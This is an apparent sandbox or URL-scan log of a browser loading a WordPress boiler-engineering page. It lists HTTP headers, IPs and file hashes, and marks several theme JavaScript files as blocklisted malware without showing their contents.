Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/x-javascript
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:40 GMT
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "90b5-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 8269
date: Tue, 27 Sep 2022 06:18:40 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with CRLF line terminators
Size:   8269
Md5:    b46267a95223fd7baa0aee1931cd6964
Sha1:   9a069968f3edd327183d2426d004e11259baa83b
Sha256: 440f15d6277e6dd3185f6db725cac4fac0bd602f61044d72490ce9ea5b7a0887
                                        
                                            GET /wp-content/themes/industrial/js/jquery.swipebox.js?ver=5.2.16 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/x-javascript
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:40 GMT
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "6461-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 6053
date: Tue, 27 Sep 2022 06:18:40 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   6053
Md5:    b44b26124498d04e349ccdf85f31e3da
Sha1:   6d936f32bba6d3baa7cc26210c2cecf49beef4d2
Sha256: 9c811b9a34dad3db5bc5ab460e3a92a6cebe4c01f61d682616d1308fe5fa4d96

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/industrial/js/bootstrap/bootstrap.min.js?ver=5.2.16 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/x-javascript
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:40 GMT
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "8fd6-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 9770
date: Tue, 27 Sep 2022 06:18:40 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with very long lines (32034), with CRLF line terminators
Size:   9770
Md5:    92078065c6bac430429cb347bca7d1e8
Sha1:   398b8503c88072d06deee2a54f1f50cfa30e04de
Sha256: f55e3f9f06ccfc63bb4e9b94234f90202a2760b89acc74fd61fd18a4c9cd2dbf

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/uploads/Lancashire-Fire-Tube-Boiler-300x199.jpg HTTP/1.1 
Host: www.elprocus.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         206.189.131.248
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
date: Tue, 27 Sep 2022 06:18:39 GMT
content-length: 19165
last-modified: Thu, 13 Dec 2018 06:53:03 GMT
etag: "5c1201cf-4add"
expires: Thu, 31 Dec 2037 23:55:55 GMT
cache-control: max-age=315360000
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", baseline, precision 8, 300x199, components 3\012- data
Size:   19165
Md5:    6e26097bc7dcd3ce5183ad3c9afcadbc
Sha1:   9f87fdba8739ce1f1f8accbce4f1c5aaa48b8e04
Sha256: f45e3bd6606f56dbce20be4126c2733453bf9f1a71f314290735b128115ab7e0
                                        
                                            GET /wp-content/themes/industrial/js/doubletaptogo.js?ver=5.2.16 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/x-javascript
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:40 GMT
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "260f-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 3353
date: Tue, 27 Sep 2022 06:18:40 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with very long lines (6354), with CRLF line terminators
Size:   3353
Md5:    3a477a80b3dba84bdd15c517b7f83df7
Sha1:   f54aae0b203de8a874ecb53681c54c1960148bfa
Sha256: 7c2ea48d8f2f5e0d3593a85fb9e983e92d1d4e90b0a1d20acfa5e5debacdaf6e
                                        
                                            GET /wp-content/themes/industrial/js/functions.js?ver=5.2.16 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/x-javascript
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:40 GMT
last-modified: Fri, 17 Jun 2016 03:51:30 GMT
etag: "9e12-576373c2-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 10624
date: Tue, 27 Sep 2022 06:18:40 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with very long lines (1673), with CRLF line terminators
Size:   10624
Md5:    d91365dc0d9fa0c38d9beba66a97c179
Sha1:   2c13fee9a5d1ba23cb41b74e4b0e31c5d6256333
Sha256: 54f0a1eac958391d995f5afc56a83c3c83c805638d338d21c90a1952dc8a7a99

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/industrial/js/owlcarousel/owl.carousel.js?ver=5.2.16 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/x-javascript
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:40 GMT
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "1412d-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 17695
date: Tue, 27 Sep 2022 06:18:40 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   17695
Md5:    3b8621875de5d05c8eaff0e926ee41a9
Sha1:   1fc9d27c012e905c13410a3b509f29271bcc6152
Sha256: db298a4dc6d4f14fc38e8479cdfad019d6edd0bee935f748883563cd023dc788

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E47D6E33FE9F6E588D308B62FA059C960A000C56651713E30BAF6CD09B7DE41"
Last-Modified: Sun, 25 Sep 2022 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=6874
Expires: Tue, 27 Sep 2022 08:13:14 GMT
Date: Tue, 27 Sep 2022 06:18:40 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E47D6E33FE9F6E588D308B62FA059C960A000C56651713E30BAF6CD09B7DE41"
Last-Modified: Sun, 25 Sep 2022 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=6874
Expires: Tue, 27 Sep 2022 08:13:14 GMT
Date: Tue, 27 Sep 2022 06:18:40 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E47D6E33FE9F6E588D308B62FA059C960A000C56651713E30BAF6CD09B7DE41"
Last-Modified: Sun, 25 Sep 2022 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=6874
Expires: Tue, 27 Sep 2022 08:13:14 GMT
Date: Tue, 27 Sep 2022 06:18:40 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fe39ddaa9-a775-40b9-af3a-870507ff4d52.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 5142
x-amzn-requestid: 5b86b092-ff60-476c-855a-d32d5f10f115
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: Yvz1CGInoAMF0Vw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63296686-79e9a4cb75289e1b0785d4fc;Sampled=0
x-amzn-remapped-date: Tue, 20 Sep 2022 07:06:46 GMT
x-amz-cf-pop: SEA73-P2, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: 7k1682yCSjI5mtQhFZ8S1eSMo2qYEd7HF2T58X3cbCV2112QE46zXQ==
via: 1.1 2a44ef7b9d28e74c78ffadeedcbb887c.cloudfront.net (CloudFront), 1.1 5fe5f2a3903f1378941d92eceaf3fa16.cloudfront.net (CloudFront), 1.1 google
date: Mon, 26 Sep 2022 21:49:33 GMT
age: 30547
etag: "8fbe2856a3e05ae7c45f4e35944d2835d47e4284"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   5142
Md5:    e56f576ce4c320252cd028a38a1e4bde
Sha1:   8fbe2856a3e05ae7c45f4e35944d2835d47e4284
Sha256: dc5783e5d50e89d2b9c72dea55751a64157dbc9ec9be85383a6df10b5ec1a602
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F1bfe3adc-1955-4f21-9e44-c0bc53a4edc5.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 9163
x-amzn-requestid: 8ccd9b1f-bef9-4591-be32-e6dd98f4ee78
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZFlKpEZrIAMFS1Q=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63321bdd-4a40b9c8281b64c725fec0f1;Sampled=0
x-amzn-remapped-date: Mon, 26 Sep 2022 21:38:37 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: bs6HOUmHOoYKDuzBoVHhcr8d4HP4bBmwUF3EtOmwKXo7ozhfaIYEvw==
via: 1.1 e291f351a18746d40754b367095a2872.cloudfront.net (CloudFront), 1.1 707e733794d52100fde0ab21bf0b1462.cloudfront.net (CloudFront), 1.1 google
date: Mon, 26 Sep 2022 21:39:07 GMT
age: 31173
etag: "84f5a4c8b38acde814bc790e5b514347718d5bb9"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   9163
Md5:    deb8d1e3b6d7fbc8c8ba478269621676
Sha1:   84f5a4c8b38acde814bc790e5b514347718d5bb9
Sha256: ed14fa766f0708b4166e83b61f160db5671af430917b7c67184bf18d9208742b
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fe94c315c-bcc5-4538-9c7b-7c0a9f2dccbc.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 7146
x-amzn-requestid: 0470759c-7b3e-4e73-a4fa-15f9f3919834
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZASNOGKzIAMFfaw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-632ffd87-7856f7180fa1045a6092b335;Sampled=0
x-amzn-remapped-date: Sun, 25 Sep 2022 07:04:39 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: Kxa2h6hEjuAgCj3z9G2K1FzuWUMA3c5-9LM8KpjqmdP9Zm8RPoSxGg==
via: 1.1 a4fe306096165bb1e86e69365dc8fac2.cloudfront.net (CloudFront), 1.1 2324edbcb8fc72f617442c65f36a40fc.cloudfront.net (CloudFront), 1.1 google
date: Mon, 26 Sep 2022 07:31:34 GMT
age: 82026
etag: "49546314082f2e4f4c4c2686cc0ca281ae6bae47"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7146
Md5:    2267eb0a20554688393db616344441ee
Sha1:   49546314082f2e4f4c4c2686cc0ca281ae6bae47
Sha256: 4e37955fb99beb25ceb9deb7c4398914af4192c2e3614e5d68cdafa8c85b256e
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F06b0646c-a8d3-4b51-ba84-a3c3dff2883c.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 7128
x-amzn-requestid: 5806782b-498e-427b-be73-a94695e3cacf
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZFlPfFn4IAMFwMg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63321bfc-07a420d631e463286c1dafa0;Sampled=0
x-amzn-remapped-date: Mon, 26 Sep 2022 21:39:08 GMT
x-amz-cf-pop: SFO5-P2, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: 1XA-bBkY_FXGy2X6EITlNNf-QSMLu2POxTo1Vq6bcqkEkkOni45zIQ==
via: 1.1 6c90b631453c435bd0022caa657b67e8.cloudfront.net (CloudFront), 1.1 1481cc55c02c3a782ad420b6bac2cb32.cloudfront.net (CloudFront), 1.1 google
date: Mon, 26 Sep 2022 21:39:08 GMT
etag: "4dbd2da7f7c45a97e3f6f6544ed428e892227cc3"
age: 31172
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7128
Md5:    4197a8a505b360b0c43142faf8cb7f48
Sha1:   4dbd2da7f7c45a97e3f6f6544ed428e892227cc3
Sha256: 434039a91ec37c8ff827c78f7613aa4f6416ded182b01140048a52654a2de4ce
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F171029d0-40d4-47b3-8936-8ba3b16b3212.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 10211
x-amzn-requestid: 3ea4ac84-2465-4bd1-8ade-863de3c9576e
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YbfSuGoQoAMF9oQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-632145aa-7843b82728ead9a053c689d1;Sampled=0
x-amzn-remapped-date: Wed, 14 Sep 2022 03:08:26 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: p1vYTqYjOmYHjVmJ8f6qyT_nLIsyXsr7ZI-DI7JBF9RJa0ZJNPiluA==
via: 1.1 86b676273517904f44af31586adb06ae.cloudfront.net (CloudFront), 1.1 e95ec8f1dc02e32f0cb9e113963ceb4e.cloudfront.net (CloudFront), 1.1 google
date: Mon, 26 Sep 2022 21:56:23 GMT
age: 30137
etag: "be60bbc96c832ae385cc9ae5828bd32703011b21"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   10211
Md5:    347dca206e13a3b13953f0ab398310b4
Sha1:   be60bbc96c832ae385cc9ae5828bd32703011b21
Sha256: f6da888a54a0c6c73466f2c2a72dd875514a39d81b760a6b0116b4dd56ef31dd
                                        
                                            GET /css?family=PT+Sans%3A400italic%2C400%2C600%2C700%2C300&subset=latin%2Clatin-ext&ver=5.2.16 HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://biasbd.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.10
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Tue, 27 Sep 2022 06:18:38 GMT
date: Tue, 27 Sep 2022 06:18:38 GMT
cache-control: private, max-age=86400
cross-origin-opener-policy: same-origin-allow-popups
cross-origin-resource-policy: cross-origin
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (2160)
Size:   1570
Md5:    7ce8f03fd3133dc0f7bbe7ae270372d2
Sha1:   a7f01fdd6da3083f77884e08a8cddf307c3d37cb
Sha256: 44f03f5e87b24448a0486e163c85f783cd6974c40db72133941ef11bfddb963b
                                        
                                            GET /wp-content/plugins/newsletter/subscription/validate.js?ver=6.1.0 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/x-javascript
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:40 GMT
last-modified: Mon, 01 Jul 2019 18:27:50 GMT
etag: "441-5d1a50a6-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 373
date: Tue, 27 Sep 2022 06:18:40 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text
Size:   373
Md5:    6c3c2b5c43018392a4c3df17871a5f56
Sha1:   fba911101732bb6df58cdfce5535d60733f159c3
Sha256: e488e838b05792b01c8a69770395a212314e5ef518fdc97d82d9394e9218b07b
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F334b6513-7266-4f03-aae2-328c1b58a30e.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 10864
x-amzn-requestid: a6be937a-3e8f-4dad-bbca-f28554f5ff21
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YioQqFHsoAMFxXQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-632420d0-78fecb9e2f76416044839a35;Sampled=0
x-amzn-remapped-date: Fri, 16 Sep 2022 07:08:00 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: l-svEjPVAfeYvCQAHsARjTk9PNdkVGUJA_2415312kWF2x6MDI7o7A==
via: 1.1 98e601970ea59f4d5f56a752787ff9fc.cloudfront.net (CloudFront), 1.1 0d4ebcaa87ba94709def0eaac9371e5a.cloudfront.net (CloudFront), 1.1 google
date: Mon, 26 Sep 2022 07:52:33 GMT
age: 80767
etag: "2a2fabd9f9792daf9c058fc754d5616267b703f1"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   10864
Md5:    56c3768b851e6a5206cbfbe3f5a97cae
Sha1:   2a2fabd9f9792daf9c058fc754d5616267b703f1
Sha256: 668dba22a0c81c4580637806c293521b176512b18ebcc2fe951be2f27f43134d
                                        
                                            GET /wp-includes/js/wp-embed.min.js?ver=5.2.16 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: application/x-javascript
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:40 GMT
last-modified: Thu, 15 Apr 2021 13:19:42 GMT
etag: "56f-60783d6e-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 743
date: Tue, 27 Sep 2022 06:18:40 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with very long lines (1391), with no line terminators
Size:   743
Md5:    b146105040f6faa62806b35ad455d121
Sha1:   14aa49ed4f29b666221a8de3fd17f04455f12b15
Sha256: 05f4d51649be6878352af6843f9a5ffc14bb96ca7a02db21a35a14f6a150b004
                                        
                                            GET /wp-content/plugins/js_composer/assets/lib/bower/isotope/dist/isotope.pkgd.min.js?ver=5.5 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
